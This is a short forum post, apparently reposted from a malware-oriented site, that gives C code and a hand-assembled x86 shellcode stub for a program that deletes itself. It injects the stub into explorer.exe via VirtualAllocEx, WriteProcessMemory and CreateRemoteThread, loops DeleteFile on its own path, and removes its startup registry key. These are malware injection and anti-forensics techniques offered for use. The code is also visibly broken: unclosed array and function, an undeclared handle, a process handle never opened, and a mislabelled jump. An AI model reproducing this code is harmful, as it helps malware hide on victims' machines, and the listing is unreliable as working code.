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[C] Self Delete - explorer.exe injection

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[C] Self Delete - explorer.exe injection

Author: __v00d00

// __v00d00 __ OpenSC.ws __
// A process cannot simply delete itself
// At some point, code will have to run in the context of another process
// People typically run a batch file in the background - but this can be noticable
// I inject an assembly stub into explorer.exe - it loops on DeleteFile
// Once the file is deleted the thread exits.
// I also have the thread sleep so that explorer.exe doesn't start eating up too many resources.
// Then the thread kills itself.

void selfDestruct()
BYTE stub[] = {
// "\xcc" // debug int 3
"\x68" "\xDE\xAD\xBE\xAF" // push argument (pointer to path)
"\xB8" "\xDE\xAD\xBA\xBE" // mov eax DeleteFile
"\xFF\xD0" // call eax
"\x50" // push eax
"\x68" "\x00\x01\x00\x00" // push 100
"\xB8" "\xDE\xAD\xBE\xAF" // mov eax Sleep
"\xFF\xD0" // call eax
"\x58" // pop eax
"\x85\xc0" // test eax, eax
"\x74\xe2" // jnz to start
"\x6A" "\x00" // push 0
"\xB8" "\xDE\xAD\xBE\xAF" // mov eax RtlExitUserThread
"\xFF\xD0" // call eax

HANDLE hProc, hThread;
DWORD pid;
LPVOID pRemotePathStr, pRemoteStub;
char ourPath[MAX_PATH];
HMODULE hKernel;
DWORD dwDeleteFile;
DWORD dwSleep;
DWORD dwExitThread;

GetModuleFileName(NULL, ourPath, MAX_PATH);
pid = GetPidByName("explorer.exe");
if(!pid) return;

hKernel = GetModuleHandle("kernel32.dll");
if(!hKernel) return;

hNtdll = GetModuleHandle("ntdll.dll");
if(!hNtdll) return;

dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
dwExitThread = (DWORD)GetProcAddress(hNtdll, "RtlExitUserThread");

if (hProc == NULL) return;

pRemotePathStr = VirtualAllocEx(hProc, NULL, strlen(ourPath) + 1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemotePathStr == NULL) return;

if (!WriteProcessMemory(hProc, pRemotePathStr, ourPath, strlen(ourPath) + 1, NULL)) return;

pRemoteStub = VirtualAllocEx(hProc, NULL, sizeof(stub), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteStub == NULL) return;

memcpy(stub + 1, &pRemotePathStr, 4);
memcpy(stub + 6, &dwDeleteFile, 4);
memcpy(stub + 19, &dwSleep, 4);
memcpy(stub + 33, &dwExitThread, 4);

if (!WriteProcessMemory(hProc, pRemoteStub, stub, sizeof(stub), NULL))

hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteStub, NULL, 0, 0);
if (!hThread) return;

DelStartUp(); // remove our startup key


Sursa: Self Delete

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